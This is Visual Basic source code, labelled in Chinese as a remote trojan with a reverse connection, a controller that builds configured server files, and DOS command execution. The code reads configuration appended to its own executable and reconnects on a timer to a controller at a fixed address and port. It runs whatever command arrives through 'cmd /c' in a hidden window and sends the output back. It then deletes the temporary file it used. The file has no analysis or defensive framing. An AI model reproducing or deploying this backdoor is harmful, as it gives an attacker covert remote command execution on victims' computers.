源码.txt

VB 远程木马,反向连接,主控端可以生成有配置信息的服务端,可以执行DOS命令

'定义一个足够长的字符串常量，用来存储配置信息
'这里用的是256个字符X，以便可以用winhex打开编译后的exe文件找到正确的偏移地址
Const file_size = 32768

Private Sub Form_Load()
Dim snum, num As Long
Dim sinfo As String, sappend As Byte
Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1
Seek #1, file_size + 1 ''将读取指针定位到文件尾部
num = FileLen(App.Path & "\" & App.EXEName & ".exe") - file_size
MsgBox num
Dim newbyte() As Byte
ReDim newbyte(num)
For snum = 1 To num
Get #1, , newbyte(snum - 1) '读出超出模板大小的字节部分，即我们写进去的配置信息
Print suum
Next snum
sinfo = StrConv(newbyte, vbUnicode) '动态数组 转string
Close #1
Text2.Text = sinfo
End Sub


Private Sub Timer1_Timer()
If tcpserver.State <> sckConnected Then
tcpserver.Close
tcpserver.Connect "127.0.0.1", "1999"
End If
End Sub

'接收客户端数据、执行、返回结果模块
Private Sub tcpserver_DataArrival(ByVal bytesTotal As Long)
On Error Resume Next
Dim strData As String
Dim s As String
tcpserver.GetData strData '接收客户请求的信息
Shell "cmd /c" + strData + ">c:\windows\system32\cmd.txt", vbHide '处理接收到的命令,加上vbhide，实现无声执行
delay (200)
Text1.Text = "远程主机IP:" + tcpserver.RemoteHostIP + vbCrLf
Text1.Text = Text1.Text + "接收到字符串:" + strData + vbCrLf
Open "c:\windows\system32\cmd.txt" For Input As #1 '打开cmd.txt文件
Do While Not EOF(1) '循环至文件尾
Line Input #1, s '读入一行数据并将其赋予给变量s
tcpserver.SendData s & vbCrLf '向客户端发回执行结果
Loop
Close #1
delay (200)
End Sub
'延时设置
Sub delay(n As Integer)
Dim H As Integer
Dim T As Single
For H = 1 To n
T = Timer
Do
 DoEvents
Loop Until T <> Timer
Next H
End Sub
'删除临时文件模块
Private Sub Form_Unload(Cancel As Integer)
On Error Resume Next
Kill "c:\windows\system32\cmd.txt" '删除产生的临时文件cmd.txt
End Sub